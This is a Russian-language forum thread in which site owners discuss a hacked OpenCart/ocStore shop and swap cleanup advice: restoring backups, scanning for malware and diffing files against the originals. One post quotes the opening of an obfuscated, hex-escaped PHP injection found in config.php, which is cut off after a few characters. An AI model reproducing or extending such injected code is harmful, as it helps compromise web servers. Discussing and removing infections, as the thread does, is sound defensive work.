Перейти к содержанию

Рекомендуемые сообщения

Добрый день, админку сайта взломал какой-то турецкий школьник, оставив красноречивое послание на первой картинке. «nah sana panel lamercik»

Проверил фтп, там добавлены несколько html файлов левых. Как видно на скринах, даты разные. 

Изменений в системных файлов не нашёл.php.ini чистый. config.php чистый. 

Посмотрел в index.php в админке - он снёс весь код и вставил свой, который виден на 1 скрине. Вопрос - как? Я должен устранить уязвимость, пожалуйста, помогите.

tuskishscam.PNG

turkishscam1.PNG

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Раз взломал, то где угодно мог закладок наделать. Весь сайт проверять надо. И соседние сайты тоже, если с одного акка работают. 

Если не рассматривать восстановление из резервной копии, то вариантов два.

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Не дешевый - заказать чистку/восстановление сайта

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

э... дешевый и правильный - восстановить из бэкапа.

все остальное компромисс.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А такой вариант как защитить уже 3 раз за 4 месц. идет такой код <?php ${"\x47\x4cO\x42\x41L\x53"}["l\x69\x71p\x73\x69\x76\x70"]="m\x65";${"GL   пишет его в config.php который в корне. Декодировал сдесь. http://ddecode.com/hexdecoder/

Версия ocStore 2.1.0.2.1 стоит на ВПС под Центос 7

Infecsia-config.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2 часа назад, Shureg сказал:

 

Изменено пользователем Praetorioan

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
7 часов назад, Shureg сказал:

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Спасибо!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
8 часов назад, nikifalex сказал:

почему вы думаете что админку?

Я не знаю что конкретно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 минуты назад, Praetorioan сказал:

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Уважаемый, толку что вы будите гуглить уязвимости opencart
Их нет
Вам четко сказали как вас взломали

 

2 часа назад, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
14 часов назад, markimax сказал:

Вам четко сказали как вас взломали

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 25.10.2017 в 10:15, nikifalex сказал:

дешевый и правильный - восстановить из бэкапа.

В данном случае да, но не всегда прокатывает...

 

У одного клиента начались проблемы с сайтом. В процессе поиска были обнаружены левые файлы. Просмотрели архивы файлов, так эти левые файлы обнаружены в архивах почти годовой давности. Хорошо, что были и более ранние архивы. А у большинства пользователей есть только с десяток архивов на хостинге, т. е. в подобной ситуации они уже заражены.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 26.10.2017 в 08:01, nikifalex сказал:

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Какую ценность несёт это сообщение в этой ветке? Зачем ты это пишешь? Из-за таких как ты, конкретно из-за тебя русское сообщество - крайне токсичное место, находиться здесь иногда неприятно. Поздравляю, ты посильно вносишь в это свой личный вклад.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 04.11.2017 в 12:01, nikifalex сказал:

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

PhpStorm Отлично сравнивает файлы - не только на есть ли лишние, а и на структуру php html файлов) 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×